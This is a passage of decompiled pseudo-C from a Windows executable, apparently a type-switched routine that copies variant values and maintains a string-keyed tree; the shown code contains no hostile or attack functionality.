																				_t1396 = _a4;
																				_t1809 = _t1809 + 4;
																				goto L189;
																			}
																		}
																	}
																} else {
																	_t1160 =  *(_t1403 + 0xc);
																	__eflags = _t1160;
																	if(_t1160 != 0) {
																		E004431AD(_t1160);
																		 *(_t1403 + 0xc) = 0;
																	}
																	_t1162 =  *(_t1403 + 8);
																	__eflags = _t1162 - 8;
																	if(_t1162 == 8) {
																		_t1485 =  *_t1403;
																		__eflags = _t1485;
																		if(_t1485 == 0) {
																			goto L158;
																		}
																		__imp__#9(_t1485);
																		_push( *_t1403);
																		E004111DC();
																		_t1809 = _t1809 + 4;
																		goto L162;
																	} else {
																		L158:
																		__eflags = _t1162 - 0xa;
																		if(_t1162 == 0xa) {
																			_t1163 =  *_t1403;
																			__eflags = _t1163;
																			if(_t1163 != 0) {
																				E0044318E(_t1163);
																			}
																		} else {
																			__eflags = _t1162 - 5;
																			if(_t1162 == 5) {
																				E0040E270(_t1403, _t1777);
																			} else {
																				__eflags = _t1162 - 0xb;
																				if(_t1162 == 0xb) {
																					_push( *((intOrPtr*)( *_t1403 + 4)));
																					E004111DC();
																					_push( *_t1403);
																					E004111DC();
																					_t1809 = _t1809 + 8;
																				} else {
																					__eflags = _t1162 - 0xc;
																					if(_t1162 == 0xc) {
																						_t1173 =  *_t1403;
																						__eflags = _t1173;
																						if(_t1173 != 0) {
																							E0044B3D9(_t1173);
																						}
																					}
																				}
																			}
																		}
																		L162:
																		 *(_t1403 + 8) = 1;
																		 *_t1403 = 0;
																		_t1164 =  *(_t1777 + 8);
																		 *(_t1403 + 8) = _t1164;
																		__eflags = _t1164 - 4;
																		if(__eflags != 0) {
																			_t1165 = _t1164 - 1;
																			__eflags = _t1165 - 0xb;
																			if(__eflags > 0) {
																				goto L166;
																			}
																			switch( *((intOrPtr*)(_t1165 * 4 +  &M0042AEDE))) {
																				case 0:
																					__eax =  *__esi;
																					 *__ebx = __eax;
																					goto L166;
																				case 1:
																					 *_t1403 =  *_t1777;
																					 *((intOrPtr*)(_t1403 + 4)) =  *((intOrPtr*)(_t1777 + 4));
																					goto L166;
																				case 2:
																					__fp0 =  *__esi;
																					 *__ebx =  *__esi;
																					goto L166;
																				case 3:
																					goto L163;
																				case 4:
																					_push(0x214);
																					__eax = E004115D7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						__eax = 0;
																						__eflags = 0;
																					} else {
																						__esi =  *__esi;
																						__ecx = 0x85;
																						__edi = __eax;
																						__eax = memcpy(__eax, __esi, 0x85 << 2);
																						__esi + __ecx = __esi + __ecx + __ecx;
																						__ecx = 0;
																					}
																					 *__ebx = __eax;
																					__eflags =  *(__eax + 4);
																					if( *(__eax + 4) != 0) {
																						__eax =  *(__eax + 4);
																						 *__eax =  *__eax + 1;
																						__eflags =  *__eax;
																					}
																					goto L495;
																				case 5:
																					__ecx =  *__esi;
																					 *__ebx = __ecx;
																					goto L166;
																				case 6:
																					__eflags =  *__esi;
																					if(__eflags == 0) {
																						L495:
																						__edi = _a4;
																						goto L166;
																					}
																					_push(0x10);
																					__eax = E004115D7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					_push(__eax);
																					 *__ebx = __eax;
																					__imp__#8();
																					__edx =  *__esi;
																					__eax =  *__ebx;
																					_push( *__esi);
																					_push(__eax);
																					__imp__#10();
																					__eflags = __eax;
																					if(__eax < 0) {
																						__ecx =  *__ebx;
																						_push( *__ebx);
																						__imp__#9();
																						__edx =  *__ebx;
																						_push( *__ebx);
																						__eax = E004111DC();
																						__esp = __esp + 4;
																						 *__ebx = 0;
																					}
																					goto L166;
																				case 7:
																					 *__ebx =  *__esi;
																					goto L166;
																				case 8:
																					_push(0x18);
																					__eax = E004115D7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						goto L502;
																					}
																					__ecx =  *__esi;
																					__eax = E0044B8A3(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																				case 9:
																					_push(8);
																					__eax = E004115D7(__edi, __esi, __eflags);
																					 *__ebx = __eax;
																					__edx =  *__esi;
																					__ecx =  *( *__esi);
																					 *__eax =  *( *__esi);
																					__edx =  *__ebx;
																					__eax =  *( *__ebx);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eflags == 0) {
																						_push(1);
																						__eax = E004115D7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *(__ecx + 4) = __eax;
																						__edx =  *__ebx;
																						__eax =  *( *__ebx + 4);
																						__esp = __esp + 4;
																						 *__eax = 0;
																					} else {
																						_push(__eax);
																						__eax = E004115D7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *( *__ebx + 4) = __eax;
																						__ebx =  *__ebx;
																						__edx =  *__ebx;
																						__eax =  *__esi;
																						__ecx =  *( *__esi + 4);
																						__esp = __esp + 4;
																						__edx = __ebx[1];
																						__eax = E00410E60(__ebx[1],  *( *__esi + 4),  *__ebx);
																					}
																					goto L166;
																				case 0xa:
																					_push(0x14);
																					__eax = E004115D7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						L502:
																						__eax = 0;
																						 *__ebx = 0;
																						goto L166;
																					}
																					__ecx =  *__esi;
																					__eax = E00470870(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																			}
																		}
																		L163:
																		_push(0x10);
																		_t1166 = E004115D7(_t1733, _t1777, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1166;
																		if(_t1166 == 0) {
																			_t1166 = 0;
																		} else {
																			_t1487 =  *(_t1777 + 0xc);
																			 *_t1166 =  *_t1487;
																			 *((intOrPtr*)(_t1166 + 4)) =  *((intOrPtr*)(_t1487 + 4));
																			 *((intOrPtr*)(_t1166 + 8)) =  *((intOrPtr*)(_t1487 + 8));
																			_t1488 =  *(_t1487 + 0xc);
																			 *(_t1166 + 0xc) = _t1488;
																			 *_t1488 =  *_t1488 + 1;
																			__eflags =  *_t1488;
																		}
																		 *(_t1403 + 0xc) = _t1166;
																		goto L166;
																	}
																}
															}
														}
													} else {
														_v108 = 1;
														goto L70;
														L71:
														__eflags = _v108 - _v116;
														if(_v108 > _v116) {
															E0040D530( &_v40, _t1493);
															_v104 = 0;
															_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4));
															_t1495 =  *( *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4)) + 8) & 0x0000ffff;
															__eflags = _t1495 - 0x4a;
															if(_t1495 == 0x4a) {
																L381:
																E00402780(_t1179, _t1495,  &_v40);
																_t1495 =  *(_v148 + 4);
																_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 0xc + _v212 * 4));
																L382:
																E00402780(_t1179, _t1495,  &_v40);
																E00402710(0x7f,  &_v20, _t1851);
																E00402780( &_v20, _t1495,  &_v40);
																E0040A780(_a4, _t1851,  &_v40,  &_v104,  &_v196, 0xffffffff);
																_v172 = _v228 + _v228 + _v228 + _v228;
																E00401980(1, _v224 | 0x00000200,  &_v212,  *((intOrPtr*)( *((intOrPtr*)(_v228 + _v228 + _v228 + _v228 +  *((intOrPtr*)(_v164 + 4)))))));
																L140:
																_t1193 =  *(_v148 + 4);
																_t1611 =  *(_v156 + _t1193 + 4);
																__eflags =  *(_t1611 + 8) - 0x41;
																if( *(_t1611 + 8) == 0x41) {
																	_t1611 =  *(_t1193 + 8 + _v212 * 4);
																	_t1194 =  *(_t1611 + 8) & 0x0000ffff;
																	__eflags = _t1194 - 0x4a;
																	if(_t1194 == 0x4a) {
																		L459:
																		_v212 = _v212 + 5;
																		goto L142;
																	}
																	__eflags = _t1194 - 0x49;
																	if(_t1194 == 0x49) {
																		goto L459;
																	}
																	_v212 = _v212 + 4;
																	goto L142;
																} else {
																	_t279 =  &_v212;
																	 *_t279 = _v212 + 2;
																	__eflags =  *_t279;
																	L142:
																	_t1195 = _v12;
																	_v200 = _v200 + 1;
																	__eflags = _t1195 - 0x30;
																	if(_t1195 >= 0x30) {
																		__eflags = _t1195 - 0x3f;
																		if(_t1195 <= 0x3f) {
																			_t1202 = _v20;
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				E004431AD(_t1202);
																			}
																		}
																	}
																	__eflags = _v32;
																	_v40 = 0x485a84;
																	if(_v32 > 0) {
																		_t1782 = 0;
																		__eflags = 0;
																		do {
																			_t1197 =  *(_v36 + _t1782 * 4);
																			__eflags = _t1197;
																			if(_t1197 != 0) {
																				E0044C7C0(_t1197);
																			}
																			_t1782 = _t1782 + 1;
																			__eflags = _t1782 - _v32;
																		} while (_t1782 < _v32);
																		goto L144;
																	} else {
																		L144:
																		_push(_v36);
																		_v32 = 0;
																		E004111DC();
																		_t1200 = _v108 + 1;
																		_t1809 = _t1809 + 4;
																		_v108 = _t1200;
																		__eflags = _t1200 - _v136;
																		if(_t1200 <= _v136) {
																			L70:
																			_t1493 =  *(_v148 + 4);
																			_t1778 = _v212;
																			_v12 = _t1611 | 0xffffffff;
																			_v40 = 0x485a84;
																			_v36 = 0;
																			_v32 = 0;
																			_v28 = 0;
																			_v104 = 0;
																			_t1738 =  *(_t1493 + _t1778 * 4);
																			_t1652 = _t1493 + _t1778 * 4;
																			_t1177 = 0;
																			_v10 = 0;
																			_v208 = 0;
																			__eflags =  *(_t1738 + 8);
																			if( *(_t1738 + 8) == 0) {
																				do {
																					goto L371;
																					L375:
																					_t1741 =  *_t1652;
																					__eflags =  *(_t1741 + 8);
																				} while ( *(_t1741 + 8) == 0);
																				_v212 = _t1778;
																			}
																			goto L71;
																		} else {
																			_t1393 = _v24;
																			goto L146;
																		}
																	}
																}
															}
															__eflags = _t1495 - 0x49;
															if(_t1495 != 0x49) {
																goto L382;
															}
															goto L381;
														}
														_t1746 = _v128;
														_t1660 = _v200;
														_t1204 = _t1177 | 0x00000200;
														__eflags =  *( *(_t1746 + _t1660 * 4));
														if( *( *(_t1746 + _t1660 * 4)) != 0) {
															_t1728 = _v176;
															_t1611 =  *(_v176 + _t1660 * 4);
															_t1207 = E0045F508( *( *(_t1493 + _t1778 * 4)), E00432508(_t1611), _t1204, 1);
															__eflags = _t1207;
															if(_t1207 == 0) {
																E0045E737(_t1851, _a4, 0x79,  *((short*)( *((intOrPtr*)( *(_v148 + 4) + _t1778 * 4)) + 0xa)));
																E0044B469(__eflags,  &_v32);
																E0040EDC0( &_v56, _t1728, _t1778);
																goto L625;
															}
															_v212 = _t1778 + 2;
															goto L142;
														}
														_t1664 =  *((intOrPtr*)(_v176 + _v200 * 4));
														_t1785 = _t1204;
														_t1215 = _v212 + _v212 + _v212 + _v212;
														_v156 = _t1215;
														_t1748 =  *( *(_t1215 + _t1493));
														__eflags =  *0x4a7f34; // 0x0
														if(__eflags == 0) {
															E00403E10(_t1748, _t1493, _t1664, 0x4a7f24, _t1785, __eflags, _t1664, _t1785);
															goto L140;
														}
														_v204 = _t1664;
														__eflags =  *0x4a7f3d; // 0x0
														if(__eflags != 0) {
															_t1507 =  *0x4a7f38; // 0x0
															_t1406 =  *(_t1507 + 8);
														} else {
															_t1406 =  *0x4a7f38; // 0x0
														}
														_t1219 = 0;
														_v208 = _t1406;
														__eflags =  *_t1406;
														if(__eflags == 0) {
															L94:
															_t1786 = _t1785 & 0x0000ff00;
															_push(0x20);
															_v160 = _t1785 & 0x0000ff00;
															_t1220 = E004115D7(_t1748, _t1785 & 0x0000ff00, __eflags);
															_t1826 = _t1809 + 4;
															__eflags = _t1220;
															if(__eflags == 0) {
																_t1407 = 0;
															} else {
																_t1786 = _t1220;
																 *(_t1786 + 8) = 8;
																 *(_t1786 + 4) = 0;
																_push( ~(0 | __eflags > 0x00000000) | 0x10);
																_t1265 = E004115D7(_t1748, _t1786, __eflags);
																 *_t1786 = _t1265;
																_push(4);
																 *_t1265 = 0;
																_t1266 = E004115D7(_t1748, _t1786, __eflags);
																_t1826 = _t1826 + 8;
																__eflags = _t1266;
																if(_t1266 == 0) {
																	_t1266 = 0;
																} else {
																	 *_t1266 = 1;
																}
																 *(_t1786 + 0xc) = _t1266;
																_t1407 = _t1786;
															}
															__eflags = _t1407 - _t1748;
															if(__eflags != 0) {
																_t1252 =  *(_t1407 + 0xc);
																__eflags =  *_t1252 - 1;
																if(__eflags > 0) {
																	 *_t1252 =  *_t1252 - 1;
																	 *(_t1407 + 4) = _t1748[1];
																	 *(_t1407 + 8) = _t1748[2];
																	 *_t1407 =  *_t1748;
																	_t1748 = _t1748[3];
																	 *(_t1407 + 0xc) = _t1748;
																	 *_t1748 =  *_t1748 + 1;
																} else {
																	_t1786 = _t1748[1];
																	_t222 = _t1786 + 1; // 0x1
																	_t1254 = _t222;
																	 *(_t1407 + 4) = _t1786;
																	__eflags =  *(_t1407 + 8) - _t1254;
																	if( *(_t1407 + 8) < _t1254) {
																		 *(_t1407 + 8) = E00446618(_t1254);
																		_t1256 =  *_t1407;
																		__eflags = _t1256;
																		if(__eflags != 0) {
																			_push(_t1256);
																			E004111DC();
																			_t1826 = _t1826 + 4;
																		}
																		_push( ~(0 | __eflags > 0x00000000) |  *(_t1407 + 8) * 0x00000002);
																		_t1259 = E004115D7(_t1748, _t1786, __eflags);
																		_t1826 = _t1826 + 4;
																		 *_t1407 = _t1259;
																		 *((short*)(_t1259 + _t1786 * 2)) = 0;
																	}
																	E00410E60( *_t1407,  *_t1748,  *(_t1407 + 4) +  *(_t1407 + 4) + 2);
																	_t1826 = _t1826 + 0xc;
																}
															}
															_push(0x10);
															 *((intOrPtr*)(_t1407 + 0x10)) = _v160;
															_t1222 = E004115D7(_t1748, _t1786, __eflags);
															_t1508 = 0;
															_t1809 = _t1826 + 4;
															__eflags = _t1222;
															if(_t1222 == 0) {
																L109:
																_t1223 = _v208;
																_t1750 = 0;
																 *((intOrPtr*)(_t1407 + 0x14)) = _t1508;
																 *(_t1407 + 0x1c) = 0;
																 *(_t1407 + 0x18) = 0;
																_t1787 =  *_t1223;
																__eflags = _t1787;
																if(_t1787 == 0) {
																	 *(_t1407 + 0x1c) = 0;
																	 *(_t1407 + 0x18) = 0;
																	L139:
																	 *_t1223 = _t1407;
																	goto L140;
																}
																__eflags =  *0x4a95e4 & 0x00000001;
																if(__eflags == 0) {
																	 *0x4a95e4 =  *0x4a95e4 | 0x00000001;
																	E0044A801(0x4a95c4);
																	E0041130A(__eflags, 0x425c12);
																	_t1809 = _t1809 + 4;
																}
																 *0x4a95e0 = _t1750;
																 *0x4a95dc = _t1750;
																_v112 = 0x4a95c4;
																_v140 = 0x4a95c4;
																while(1) {
																	_t1227 =  *(_t1407 + 4);
																	_t1665 =  *((intOrPtr*)(_t1787 + 4));
																	__eflags = _t1227 - _t1750;
																	if(_t1227 == _t1750) {
																		goto L431;
																	}
																	L113:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 == _t1750) {
																		L432:
																		__eflags = _t1227 - _t1750;
																		if(_t1227 != _t1750) {
																			L124:
																			_t257 = _t1787 + 0x1c; // 0x1c
																			_t1241 = _t257;
																			_v204 = _t1241;
																			_t1242 =  *_t1241;
																			__eflags = _t1242 - _t1750;
																			if(_t1242 != _t1750) {
																				_v160 = _t1242;
																				_t1243 = E004431CB(_t1242, _t1407);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1243;
																				if(_t1243 == 0) {
																					L446:
																					 *(_v140 + 0x1c) = _t1787;
																					_v140 = _t1787;
																					_t1787 =  *_v204;
																					while(1) {
																						_t1227 =  *(_t1407 + 4);
																						_t1665 =  *((intOrPtr*)(_t1787 + 4));
																						__eflags = _t1227 - _t1750;
																						if(_t1227 == _t1750) {
																							goto L431;
																						}
																						goto L113;
																					}
																				}
																				_t1245 = _v160;
																				 *_v204 =  *(_t1245 + 0x18);
																				 *(_t1245 + 0x18) = _t1787;
																				_t1787 = _t1245;
																				__eflags =  *(_t1245 + 0x1c) - _t1750;
																				if( *(_t1245 + 0x1c) == _t1750) {
																					goto L125;
																				}
																				_t1246 = _t1245 + 0x1c;
																				__eflags = _t1246;
																				_v204 = _t1246;
																				goto L446;
																			}
																			L125:
																			 *(_v140 + 0x1c) =  *(_t1787 + 0x18);
																			 *(_v112 + 0x18) =  *(_t1787 + 0x1c);
																			_t1231 =  *0x4a95e0; // 0x0
																			_t1668 =  *((intOrPtr*)(_t1787 + 4));
																			 *(_t1787 + 0x18) = _t1231;
																			_t1510 =  *0x4a95dc; // 0xa51b60
																			 *(_t1787 + 0x1c) = _t1510;
																			_t1232 =  *(_t1407 + 4);
																			__eflags = _t1232 - _t1750;
																			if(_t1232 == _t1750) {
																				__eflags = _t1668 - _t1750;
																				if(_t1668 != _t1750) {
																					L454:
																					 *(_t1407 + 0x18) =  *(_t1787 + 0x18);
																					 *(_t1407 + 0x1c) = _t1787;
																					 *(_t1787 + 0x18) = _t1750;
																					L138:
																					_t1223 = _v208;
																					goto L139;
																				}
																				L448:
																				__eflags = _t1232 - _t1750;
																				if(_t1232 != _t1750) {
																					L137:
																					_t1511 =  *0x4a95dc; // 0xa51b60
																					 *(_t1407 + 0x1c) = _t1511;
																					 *(_t1407 + 0x18) = _t1787;
																					 *(_t1787 + 0x1c) = _t1750;
																					goto L138;
																				}
																				L127:
																				__eflags = _t1232 - _t1668;
																				if(_t1232 < _t1668) {
																					_t1235 = E0040D260( *_t1407,  *_t1787, _t1668);
																					L135:
																					__eflags = _t1235 - _t1750;
																					if(__eflags < 0) {
																						goto L454;
																					}
																					if(__eflags <= 0) {
																						_t1407 = _t1787;
																						goto L138;
																					}
																					goto L137;
																				}
																				__eflags = _t1232 - _t1750;
																				if(_t1232 <= _t1750) {
																					L451:
																					_t1235 = 0;
																				} else {
																					_t1513 =  *_t1787;
																					_t1669 = _t1232;
																					_t1236 =  *_t1407;
																					while(1) {
																						__eflags =  *_t1236 -  *_t1513;
																						if(__eflags != 0) {
																							if(__eflags < 0) {
																								_t1235 = _t1236 | 0xffffffff;
																								_t1750 = 0;
																							} else {
																								_t1235 = 1;
																								_t1750 = 0;
																								__eflags = 0;
																							}
																							goto L135;
																						}
																						_t1236 = _t1236 + 2;
																						_t1513 = _t1513 + 2;
																						_t1669 = _t1669 - 1;
																						__eflags = _t1669;
																						if(_t1669 != 0) {
																							continue;
																						} else {
																							_t1750 = 0;
																							__eflags = 0;
																							goto L451;
																						}
																					}
																				}
																				goto L135;
																			}
																			__eflags = _t1668 - _t1750;
																			if(_t1668 == _t1750) {
																				goto L448;
																			}
																			goto L127;
																		}
																	}
																	__eflags = _t1227 - _t1665;
																	if(_t1227 < _t1665) {
																		_t1248 = E0040D260( *_t1407,  *_t1787, _t1665);
																		L122:
																		__eflags = _t1248 - _t1750;
																		if(__eflags < 0) {
																			L438:
																			_t762 = _t1787 + 0x18; // 0x18
																			_t1228 = _t762;
																			_v204 = _t1228;
																			_t1229 =  *_t1228;
																			__eflags = _t1229 - _t1750;
																			if(_t1229 == _t1750) {
																				goto L125;
																			}
																			_v160 = _t1229;
																			_t1237 = E004431CB(_t1407, _t1229);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1237;
																			if(_t1237 == 0) {
																				L442:
																				 *(_v112 + 0x18) = _t1787;
																				_v112 = _t1787;
																				_t1787 =  *_v204;
																				_t1227 =  *(_t1407 + 4);
																				_t1665 =  *((intOrPtr*)(_t1787 + 4));
																				__eflags = _t1227 - _t1750;
																				if(_t1227 == _t1750) {
																					goto L431;
																				}
																				goto L113;
																			}
																			_t1239 = _v160;
																			 *_v204 =  *(_t1239 + 0x1c);
																			 *(_t1239 + 0x1c) = _t1787;
																			_t1787 = _t1239;
																			__eflags =  *(_t1239 + 0x18) - _t1750;
																			if( *(_t1239 + 0x18) == _t1750) {
																				goto L125;
																			}
																			_t1240 = _t1239 + 0x18;
																			__eflags = _t1240;
																			_v204 = _t1240;
																			goto L442;
																		}
																		if(__eflags <= 0) {
																			goto L125;
																		}
																		goto L124;
																	}
																	__eflags = _t1227 - _t1750;
																	if(_t1227 <= _t1750) {
																		L435:
																		_t1248 = 0;
																	} else {
																		_t1519 =  *_t1787;
																		_t1672 = _t1227;
																		_t1249 =  *_t1407;
																		while(1) {
																			__eflags =  *_t1249 -  *_t1519;
																			if(__eflags != 0) {
																				if(__eflags < 0) {
																					_t1248 = _t1249 | 0xffffffff;
																					_t1750 = 0;
																				} else {
																					_t1248 = 1;
																					_t1750 = 0;
																					__eflags = 0;
																				}
																				goto L122;
																			}
																			_t1249 = _t1249 + 2;
																			_t1519 = _t1519 + 2;
																			_t1672 = _t1672 - 1;
																			__eflags = _t1672;
																			if(_t1672 != 0) {
																				continue;
																			} else {
																				_t1750 = 0;
																				__eflags = 0;
																				goto L435;
																			}
																		}
																	}
																	goto L122;
																	L431:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 != _t1750) {
																		goto L438;
																	}
																	goto L432;
																}
															} else {
																_t1753 = _v204;
																_t1673 =  *((intOrPtr*)(_t1753 + 8));
																_t1788 = _t1222;
																_t232 = _t1673 - 1; // 0x46
																_t1250 = _t232;
																_v140 = _t1788;
																 *((intOrPtr*)(_t1788 + 8)) =  *((intOrPtr*)(_t1753 + 8));
																 *(_t1788 + 0xc) = 0;
																__eflags = _t1250 - 0xb;
																if(__eflags > 0) {
																	L108:
																	_t1508 = _v140;
																	goto L109;
																}
																switch( *((intOrPtr*)(_t1250 * 4 +  &M0040A744))) {
																	case 0:
																		__eax =  *__edi;
																		goto L266;
																	case 1:
																		__eax =  *__edi;
																		 *__esi = __eax;
																		__ecx =  *(__edi + 4);
																		 *(__esi + 4) = __ecx;
																		goto L108;
																	case 2:
																		__fp0 =  *__edi;
																		 *__esi = __fp0;
																		goto L108;
																	case 3:
																		_push(0x10);
																		_t1251 = E004115D7(_t1753, _t1788, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1251;
																		if(_t1251 == 0) {
																			_t1251 = 0;
																		} else {
																			_t1520 =  *(_t1753 + 0xc);
																			 *_t1251 =  *_t1520;
																			 *((intOrPtr*)(_t1251 + 4)) =  *((intOrPtr*)(_t1520 + 4));
																			 *((intOrPtr*)(_t1251 + 8)) =  *((intOrPtr*)(_t1520 + 8));
																			_t1521 =  *(_t1520 + 0xc);
																			 *(_t1251 + 0xc) = _t1521;
																			 *_t1521 =  *_t1521 + 1;
																			__eflags =  *_t1521;
																		}
																		 *(_t1788 + 0xc) = _t1251;
																		goto L108;
																	case 4:
																		_push(0x214);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__edx = _v204;
																			__esi =  *__edx;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		__ecx = _v140;
																		 *__ecx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																		}
																		goto L108;
																	case 5:
																		__edx =  *__edi;
																		 *__esi = __edx;
																		goto L108;
																	case 6:
																		__eflags =  *__edi;
																		if(__eflags != 0) {
																			_push(0x10);
																			__eax = E004115D7(__edi, __esi, __eflags);
																			__esp = __esp + 4;
																			_push(__eax);
																			 *__esi = __eax;
																			__imp__#8();
																			__edx =  *__edi;
																			__eax =  *__esi;
																			_push(__edx);
																			_push(__eax);
																			__imp__#10();
																			__eflags = __eax;
																			if(__eax < 0) {
																				__ecx =  *__esi;
																				_push( *__esi);
																				__imp__#9();
																				__edx =  *__esi;
																				_push(__edx);
																				__eax = E004111DC();
																				__esp = __esp + 4;
																				 *__esi = 0;
																			}
																		}
																		goto L108;
																	case 7:
																		 *__esi =  *__edi;
																		goto L108;
																	case 8:
																		_push(0x18);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L429;
																		}
																		__ecx =  *__edi;
																		__eax = E0044B8A3(__eax,  *__edi);
																		goto L266;
																	case 9:
																		_push(8);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		 *__esi = __eax;
																		__edx =  *__edi;
																		__ecx =  *( *__edi);
																		 *__eax =  *( *__edi);
																		__edx =  *__esi;
																		__eax =  *( *__esi);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E004115D7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__esi;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *__eax = 0;
																		} else {
																			_push(__eax);
																			__eax = E004115D7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *( *__esi + 4) = __eax;
																			__esi =  *__esi;
																			__edx =  *__esi;
																			__eax =  *__edi;
																			__ecx =  *( *__edi + 4);
																			__esp = __esp + 4;
																			__edx =  *(__esi + 4);
																			__eax = E00410E60( *(__esi + 4),  *( *__edi + 4),  *__esi);
																		}
																		goto L108;
																	case 0xa:
																		_push(0x14);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L429:
																			__eax = 0;
																			L266:
																			 *__esi = __eax;
																			goto L108;
																		}
																		__ecx =  *__edi;
																		__eax = E00470870(__eax,  *__edi);
																		goto L266;
																}
															}
														} else {
															__eflags =  *0x4a95e4 & 0x00000001;
															_v161 = 0;
															if(__eflags == 0) {
																 *0x4a95e4 =  *0x4a95e4 | 0x00000001;
																E0044A801(0x4a95c4);
																E0041130A(__eflags, 0x425c12);
																_t1809 = _t1809 + 4;
																_t1219 = 0;
															}
															 *0x4a95e0 = _t1219;
															 *0x4a95dc = _t1219;
															_t1269 = 0x4a95c4;
															_v112 = 0x4a95c4;
															while(1) {
																_v140 = _t1269;
																while(1) {
																	L80:
																	_t1270 = _t1748[1];
																	_t1534 =  *_t1406;
																	_t1684 =  *(_t1534 + 4);
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		goto L386;
																	}
																	L81:
																	__eflags = _t1684;
																	if(_t1684 == 0) {
																		L387:
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			L92:
																			_t1283 =  *( *_t1406 + 0x1c);
																			__eflags = _t1283;
																			if(_t1283 != 0) {
																				_t1284 = E004431CB(_t1283, _t1748);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1284;
																				if(_t1284 == 0) {
																					L399:
																					 *((intOrPtr*)(_v112 + 0x1c)) =  *_t1406;
																					_t1286 =  *_t1406;
																					_v112 = _t1286;
																					 *_t1406 =  *(_t1286 + 0x1c);
																					L80:
																					_t1270 = _t1748[1];
																					_t1534 =  *_t1406;
																					_t1684 =  *(_t1534 + 4);
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L386;
																					}
																					goto L81;
																				}
																				_t1288 =  *( *_t1406 + 0x1c);
																				 *( *_t1406 + 0x1c) =  *(_t1288 + 0x18);
																				 *(_t1288 + 0x18) =  *_t1406;
																				 *_t1406 = _t1288;
																				__eflags =  *(_t1288 + 0x1c);
																				if( *(_t1288 + 0x1c) == 0) {
																					goto L93;
																				}
																				goto L399;
																			}
																			L93:
																			__eflags = _v161;
																			 *(_v112 + 0x1c) =  *( *_t1406 + 0x18);
																			 *(_v140 + 0x18) =  *( *_t1406 + 0x1c);
																			_t1537 =  *0x4a95e0; // 0x0
																			 *( *_t1406 + 0x18) = _t1537;
																			_t1276 =  *0x4a95dc; // 0xa51b60
																			 *( *_t1406 + 0x1c) = _t1276;
																			if(__eflags != 0) {
																				_t1408 =  *_t1406;
																				__eflags =  *_t1406;
																				if(__eflags == 0) {
																					goto L94;
																				}
																				E00408E80( *((intOrPtr*)(_t1408 + 0x14)), _v204, _v204);
																				goto L140;
																			}
																			goto L94;
																		}
																	}
																	__eflags = _t1270 - _t1684;
																	if(_t1270 < _t1684) {
																		_t1290 = E0040D260( *_t1748,  *_t1534, _t1684);
																		L90:
																		__eflags = _t1290;
																		if(__eflags < 0) {
																			L393:
																			_t1272 =  *( *_t1406 + 0x18);
																			__eflags = _t1272;
																			if(_t1272 == 0) {
																				goto L93;
																			}
																			_t1278 = E004431CB(_t1748, _t1272);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1278;
																			if(_t1278 == 0) {
																				L396:
																				 *(_v140 + 0x18) =  *_t1406;
																				_t1269 =  *_t1406;
																				 *_t1406 =  *(_t1269 + 0x18);
																				_v140 = _t1269;
																				continue;
																			}
																			_t1281 =  *( *_t1406 + 0x18);
																			 *( *_t1406 + 0x18) =  *(_t1281 + 0x1c);
																			 *(_t1281 + 0x1c) =  *_t1406;
																			 *_t1406 = _t1281;
																			__eflags =  *(_t1281 + 0x18);
																			if( *(_t1281 + 0x18) == 0) {
																				goto L93;
																			}
																			goto L396;
																		}
																		if(__eflags <= 0) {
																			_v161 = 1;
																			goto L93;
																		}
																		goto L92;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		L390:
																		_t1290 = 0;
																	} else {
																		_t1545 =  *_t1534;
																		_t1693 = _t1270;
																		_t1291 =  *_t1748;
																		while(1) {
																			__eflags =  *_t1291 -  *_t1545;
																			if(__eflags != 0) {
																				break;
																			}
																			_t1291 = _t1291 + 2;
																			_t1545 = _t1545 + 2;
																			_t1693 = _t1693 - 1;
																			__eflags = _t1693;
																			if(_t1693 != 0) {
																				continue;
																			} else {
																				_t1406 = _v208;
																				goto L390;
																			}
																		}
																		_t1406 = _v208;
																		if(__eflags < 0) {
																			_t1290 = _t1291 | 0xffffffff;
